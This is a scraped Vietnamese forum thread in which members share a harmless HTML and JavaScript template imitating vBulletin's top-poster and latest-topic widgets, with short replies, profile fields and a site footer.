        <select id="vietvbb_topstats_s">
                                <option selected="selected" value="vietvbb_top_posters">Top Poster</option>
                                <option value="vietvbb_thanked_members">Thanked</option>
                                <option value="vietvbb_newest_members">Newest Member</option>
                                <option value="vietvbb_top_starters">Top Starter</option>
                               
                               
                               
                               
                              </select>
                         
</span></li></ul>
<div style="height: 300px; width: 100%;">

<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr valign="top">
<td style="border-top: 0px none; padding: 0px; background: transparent url(http://illiweb.com/fa/pbucket.gif) no-repeat scroll center top; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" width="24"><img src="http://illiweb.com/fa/pbucket.gif" border="0"></td> <td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" width="100%" background="http://i87.servimg.com/u/f87/13/37/93/66/listbg10.gif"><div id="vietvbb_topstats_s_content" style="display: block;">

            <!-- BEGIN POSTER -->
  <div class="smallfont" style="overflow: hidden; height: 20px; width: 100%;">
           
<span style="float: left;">
<a href="" onmouseover="showtip('<center><b><font color=green>Click! để xem profile thành viên này.</font></b></center>');" onmouseout="hidetip();">
<script language="JavaScript">images = new Array(6);images[0] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[1] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[2] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[3] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[4] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[5] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";index = Math.floor(Math.random() * images.length);document.write(images[index]);</script>  <b style="float: left='180px'; padding-top: 2px;"> {POSTER.NAME}</b></a>
</span>
</div>
           
            <!-- END POSTER --></div>
<div class="smallfont" style="overflow: hidden; height: 20px; width: 100%;">

<span style="float: left;">
<a href="" onmouseover="showtip('<center><b><font color=green>Click! để xem profile thành viên này.</font></b></center>');" onmouseout="hidetip();">
<script language="JavaScript">images = new Array(6);images[0] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[1] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[2] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[3] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[4] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[5] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";index = Math.floor(Math.random() * images.length);document.write(images[index]);</script>  <b style="float: left='180px'; padding-top: 2px;"> cugia'haohoa<font color="#000000">(39)</font></a></span>

  </div> 
  <div class="smallfont" style="overflow: hidden; height: 20px; width: 100%;">

<span style="float: left;">
<a href="" onmouseover="showtip('<center><b><font color=green>Click! để xem profile thành viên này.</font></b></center>');" onmouseout="hidetip();">
<script language="JavaScript">images = new Array(6);images[0] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[1] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[2] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[3] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[4] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[5] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";index = Math.floor(Math.random() * images.length);document.write(images[index]);</script>  <b style="float: left='180px'; padding-top: 2px;"> phokoten<font color="#000000">(35)</font></a></span>

  </div>
  <div class="smallfont" style="overflow: hidden; height: 20px; width: 100%;">

<span style="float: left;">
<a href="" onmouseover="showtip('<center><b><font color=green>Click! để xem profile thành viên này.</font></b></center>');" onmouseout="hidetip();">
<script language="JavaScript">images = new Array(6);images[0] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[1] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[2] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[3] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[4] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[5] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";index = Math.floor(Math.random() * images.length);document.write(images[index]);</script>  <b style="float: left='180px'; padding-top: 2px;"> nhuxuan<font color="#000000">(34)</font></a></span>

  </div>

<div class="smallfont" style="overflow: hidden; height: 20px; width: 100%;">

<span style="float: left;">
<a href="" onmouseover="showtip('<center><b><font color=green>Click! để xem profile thành viên này.</font></b></center>');" onmouseout="hidetip();">
<script language="JavaScript">images = new Array(6);images[0] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[1] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[2] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[3] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[4] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[5] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";index = Math.floor(Math.random() * images.length);document.write(images[index]);</script>  <b style="float: left='180px'; padding-top: 2px;"> <font color="violet">vanbang1707</font><font color="#000000">(29)</font></a></span>

  </div> 
      <div class="smallfont" style="overflow: hidden; height: 20px; width: 100%;">

<span style="float: left;">
<a href="" onmouseover="showtip('<center><b><font color=green>Click! để xem profile thành viên này.</font></b></center>');" onmouseout="hidetip();">
<script language="JavaScript">images = new Array(6);images[0] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[1] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[2] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[3] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[4] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[5] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";index = Math.floor(Math.random() * images.length);document.write(images[index]);</script>&nbsp; <b style="float: left='180px'; padding-top: 2px;"> kuveu1994<font color="#000000">(26)</font></a></span>

  </div>

</td>
      </tr> </tbody></table> </div> </div></td></tr> </tbody></table>
Spoiler:
tự hack bằng tay

  Points Points : 27561
  Reputation Reputation : 2


  Thú nuôi của HTML○CSS
Trả lời chủ đề này 
Mon 06 Sep 2010, 22:02 Bài gửiTiêu đề: Re: [Chia sẻ] Last topic+ top poster ( giống VBB và tự cập nhật)
không biết gi ji nói ji đây tui yêu bạn
Xem lý lịch thành viênTôi Tôi :
Giới tính Giới tính : Nam
Đến từ Đến từ : chƯa biT
Points Points : 30618
Reputation Reputation : 19

Medal Medal :
Status Status : không biết gi ji nói ji đây tui yêu bạnÑhöx¶«ëo :
cái này thủ công quá , thời đại gì rồi thủ công thế này sao được , bi giờ có tự cập nhật không xài xài cái này mỗi tay lắm nhất là thay ảnh

  Tôi Tôi :
  Giới tính Giới tính : Nam
  Đến từ Đến từ : chƯa biT
  Points Points : 30618
  Reputation Reputation : 19

  Medal Medal :
  Status Status : không biết gi ji nói ji đây tui yêu bạn


  Thú nuôi của Ñhöx¶«ëo
Trả lời chủ đề này 
Tue 15 Nov 2011, 16:52 Bài gửiTiêu đề: Re: [Chia sẻ] Last topic+ top poster ( giống VBB và tự cập nhật)
avatar
Hyper
Men Mới
Men Mới
Xem lý lịch thành viênTôi Tôi :
Giới tính Giới tính : Nam
Tuổi Tuổi : 27
Con Giáp Con Giáp : Horse
Points Points : 26168
Reputation Reputation : 1

SN SN : 08/10/1990


Hyper :
thank

  Tôi Tôi :
  Giới tính Giới tính : Nam
  Tuổi Tuổi : 27
  Con Giáp Con Giáp : Horse
  Points Points : 26168
  Reputation Reputation : 1

  SN SN : 08/10/1990

  Thú nuôi của Hyper
Trả lời chủ đề này 
Bài gửiTiêu đề: Re: [Chia sẻ] Last topic+ top poster ( giống VBB và tự cập nhật)
Sponsored content

Sponsored content :


  Thú nuôi của Sponsored content
Trả lời chủ đề này 
[Chia sẻ] Last topic+ top poster ( giống VBB và tự cập nhật)Xem chủ đề cũ hơn Xem chủ đề mới hơn
Trang 1 trong tổng số 1 trang
Chuyển đến:
Quyền của bạnVề Đầu Trang
Bạn không có quyền trả lời bài viết---------------------------------------------------
Phát triển bởi BQT và tất ca thành viên,chúng tôi ko chịu trách nhiệm về bài viết do thành viên đưa lên
Diễn đàn Hàm Thuận Nam - Bình Thuận, liện hệ : btgaming_hoang@yahoo.com/Phone 01627420986
Style designed by: MusicRum ( Punbb )
DongThoai.Ace.St là 1 dịch vụ của hệ thống Forumotion
Bảo mật an toàn 99%. Không bị DDos, Hack, Shell, Checked....


 
 •  

Free forum | © phpBB | Free forum support | Liên hệ | Report an abuse | Create a free blog